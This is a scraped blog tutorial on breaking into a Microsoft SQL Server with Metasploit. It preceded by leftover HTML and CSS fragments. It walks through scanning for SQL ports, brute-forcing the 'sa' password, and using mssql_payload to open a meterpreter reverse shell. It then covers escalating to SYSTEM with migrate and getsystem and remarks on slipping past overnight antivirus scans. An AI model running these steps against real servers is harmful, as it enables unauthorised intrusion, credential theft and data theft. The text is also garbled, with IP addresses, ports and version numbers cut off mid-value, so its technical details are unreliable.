![]() DOCTYPE html PUBLIC "- //W3. C//DTD XHTML 1. 0 Transitional//EN". TR/xhtml. 1/DTD/xhtml. Generator" content="NReadability 1. ![]() Handheld. Friendly" content="true" />
Arial Black", Gadget, sans- serif; font- weight: 4. Lucida Console", Monaco, monospace; background: #1d. Inner a {color: #0. Inner a {color: #5. Palatino Linotype", "Book Antiqua", Palatino, serif; background- color: #f. Inner a {color: #1e. USER- CONFIGURABLE STYLING - - */. DEBUG - - */. . bug- green {background: #bbf. EMAIL / KINDLE POP UP - - */. Override html styling attributes */. Overlay" class="style- newspaper"> Whether this is done to keep troubleshooting simple for support staff or it is simply a matter of underestimating the risks, it doesnât really matter. What matters is that this makes it very easy for an attacker to get full access to the system. In this attack, we will use a standard install of Linux Kali and the preinstalled Metasploit framework. The target is a Windows XP machine, running a Microsoft SQL Server 2. The same attack will work on any MS SQL platform and Windows OS, because the weakness in the system here is the password strength, not the environment itself. Ethical Hacking Training â Resources (Info. Sec) Reconnaissance As in any attack, we will first need to gather intelligence on our target system. One option is to use tools like NMAP to scan a certain IP range for standard SQL ports. Command: Nmap âs. T âA âPO 1. 92. 1. Attacking. MS1. png" alt="" /> This scanner will identify any Microsoft SQL server in a specific IP range. Commands: use auxiliary/scanner/mssql/mssql_ping set RHOSTS 1. IP range) set THREADS 8 run Now that we have our target system (1. Microsoft SQL server (2. SP4, TCP port 1. 43. Attack This attack is based on a simple principle. In most cases Microsoft SQL server will be installed in a mixed mode instance. The default user for this is âsa.â Very often a simple password is used for this user. This means it will be relatively easy to brute- force the password, using a dictionary file. These dictionary files can be downloaded or generated. The benefit of generating a customized list is that some tools allow for the manual addition of specific terms such as the software name or vendor that could have been used by the application installer. That would cover, for instance, a password like âSandstone. SQL instance running the databases for the application âSandstoneâ. For the attack we will use the built- in tool MSSQL_Login. After specifying the target and a password file, the dictionary attack will begin. Commands: use auxiliary/scanner/mssql/mssql_login Set PASS_FILE /root/passwords. Set RHOSTS 1. 92. Set Threads 8 Set verbose false run If this step of the attack is successful, the SA password will be found. This by itself can be a valuable piece of information that can allow for the manipulation of the databases. In this attack, however, we will use the SA account to gain access to the underlying Windows operating system. Exploitation We can now use this SA password obtained to set up a connection to our target. Kali Linux has a tool built- in named mssql_payload. This tool will allow us to send a payload through port 1. We will use this payload to set up a session between the target and our attacking system. Commands: use exploit/windows/mssql/mssql_payload set RHOST 1. Password. 01 (which we have just cracked) use payload/windows/meterpreter/reverse_tcp (our selected payload) exploit Now the fun starts. A session has been opened to our target and from here we have many commands at our disposal. Keep in mind, however, that many antivirus programs will detect, block, and remove the Meterpreter files when they are installed on a target system. From experience, however, I can say that many SQL server administrators disable any form of on- access scanning, to get the most performance out of the databases hosted by the server. If this target only runs, for instance, an overnight virus scan, it will leave plenty of time to attack and gather the data from the system and then leave undetected. Instead of using the Meterpreter payload, other payloads can be used as well. This is just a matter of running the same commands as above but changing the name of the payload. Payload âgeneric/shell_bind_tcp,â for instance, will gain command prompt access to the target system. Privilege Escalation For many of these commands, we will need to increase our user access level. Tools to create screenshots and keyloggers and tools to extract password hashes will need to run with administrative privileges. This is made quite easy with the Meterpreter shell. First, we will generate a list of running processes with the âpsâ command. We can then use the âmigrateâ command to migrate to a process with a higher level of system access. In this case that will be the explorer. Now there is one extra command we need to use: getsystem. This will give the meterpreter system access to the system which is required by the migrate command.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. Archives
September 2016
Categories |